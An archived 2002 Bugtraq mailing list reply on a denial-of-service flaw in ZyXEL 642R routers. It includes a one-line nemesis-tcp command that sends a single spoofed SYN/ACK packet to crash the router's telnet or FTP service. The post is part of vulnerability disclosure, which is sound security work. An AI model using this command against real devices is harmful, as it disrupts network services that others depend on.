Home page logo

bugtraq logo Bugtraq mailing list archives

Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS -- 643R testing
From: Kistler Ueli <iuk () gmx ch>
Date: Mon, 17 Jun 2002 19:47:27 +0200


there's no need to flood the router.. just send 1 single packet and it
crashs the remote service (works on telnet and FTP, dhcp not tested... ).
Example with nemesis:
nemesis-tcp -v -S %spoofed IP possible% -D %ZyXEL router% -fS -fA -y 23
This will send a packet with SYN/ACK flags set to port 23 (Telnet) to
the router (-v allows a stdout visual of current injected packet)

  Ueli Kistler
  www.eclipse.fr.fm / iuk () gmx ch
  www.packx.net / www.eclipse.fr.fm

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]